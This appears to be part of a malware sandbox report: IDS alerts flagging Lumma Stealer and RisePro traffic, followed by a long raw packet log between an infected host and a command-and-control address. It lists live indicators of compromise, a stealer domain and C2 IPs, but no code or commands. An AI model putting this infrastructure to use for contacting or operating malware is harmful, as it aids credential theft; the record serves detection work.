| 04/21/24-15:31:45.038330 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49779 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:45.673426 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49780 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:33.057817 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49766 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:24.609439 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49755 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:41.199553 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49774 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:34.487931 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49768 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:37.580199 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49772 | 443 | 192.168.2.4 | 172.67.189.66 |
                                                                                                                                            04/21/24-15:31:20.726146TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49742443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:24.761343TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49757443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:21.449796TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49744443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:26.584600TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49763443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:36.076592TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49770443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:42.756248TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49776443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:00.128706TCP2049060ET TROJAN RisePro TCP Heartbeat Packet4973250500192.168.2.4193.233.132.253
                                                                                                                                            04/21/24-15:31:22.967985TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49749443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:25.400720TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49759443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:44.323393TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49778443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:27.781654TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49765443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:23.794727TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49752443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:46.836355TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49781443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:00.343729TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5050049732193.233.132.253192.168.2.4
                                                                                                                                            04/21/24-15:31:11.754990TCP2046267ET TROJAN [ANY.RUN] RisePro TCP (External IP)5050049732193.233.132.253192.168.2.4
                                                                                                                                            04/21/24-15:31:22.151633TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49746443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:38.597070TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:18.854130030 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854180098 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854186058 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854190111 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854203939 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854232073 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854244947 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854260921 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854322910 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854373932 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854424000 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854456902 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854466915 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854475021 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854516029 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854532957 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854649067 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854657888 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854688883 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854696035 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854707956 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854732037 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854743958 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854753971 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854801893 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854929924 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854938984 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854983091 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854985952 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854999065 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855009079 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855017900 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855055094 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.855057001 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855067968 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855079889 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855115891 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.855168104 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.947947979 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948024035 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948599100 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948612928 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948648930 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948683977 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948717117 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948729992 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948740005 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948750973 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948760986 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948767900 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948770046 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948781013 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948790073 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948812008 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948812008 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948846102 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095181942 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095236063 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095263958 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095271111 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095304966 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095309973 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095341921 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095365047 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095379114 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095408916 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095416069 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095434904 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095470905 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095520020 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095561981 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095572948 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095582962 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095602036 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095621109 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095638990 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095684052 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095710993 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095747948 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095762014 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095774889 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095803976 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095833063 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095856905 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096165895 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096178055 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096188068 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096200943 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096206903 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096213102 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096237898 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096251965 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096283913 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096308947 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096333027 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096358061 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096508980 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096613884 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096626043 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096642017 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096700907 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096714020 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.096834898 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.096905947 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097004890 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.097055912 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097067118 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097135067 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.097165108 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097235918 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.097265005 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097390890 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097470045 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.097485065 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097498894 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097549915 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097559929 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.097590923 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097600937 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097722054 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.097732067 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.196273088 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.196290970 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.196305990 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.196326971 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.196341038 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.196341038 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.196355104 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.196367979 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.196379900 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.196393013 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.444334984 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.444346905 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.444346905 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.444365978 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.444390059 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691086054 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691107988 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691118956 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691131115 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691143036 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691154957 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691170931 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691185951 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691190958 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691204071 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691219091 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691231012 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691231966 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691231012 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691246986 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691262007 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691262007 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691291094 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691323042 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691337109 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691351891 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691364050 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691390038 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691390038 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691466093 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691481113 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691492081 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691507101 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691509962 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691534042 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691544056 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691561937 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691586018 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691740036 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691752911 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691764116 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691776037 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691790104 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691798925 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691807032 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691817045 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691821098 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691833019 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691837072 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691852093 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691864967 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691869974 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691876888 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691890955 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691891909 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691906929 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691909075 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691924095 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691937923 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691941977 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691950083 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691961050 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691963911 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691977024 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.691977024 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.691989899 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692004919 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692011118 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692025900 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692030907 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692039013 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692048073 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692049980 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692061901 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692075968 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692079067 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692089081 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692111015 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692121029 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692121029 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692123890 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692138910 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692145109 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692151070 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692164898 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692172050 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692176104 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692189932 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692189932 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692203045 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692203045 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692214966 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692229986 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692238092 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692241907 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692255974 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692264080 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692270041 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692280054 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692282915 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692296028 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692297935 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692307949 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692322016 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692332029 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692336082 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692349911 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692358971 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692363024 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692374945 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692375898 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692388058 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692400932 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692405939 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692413092 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692425966 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692430973 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692440033 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692446947 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.692451954 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.692464113 CEST4974080192.168.2.4193.233.132.253
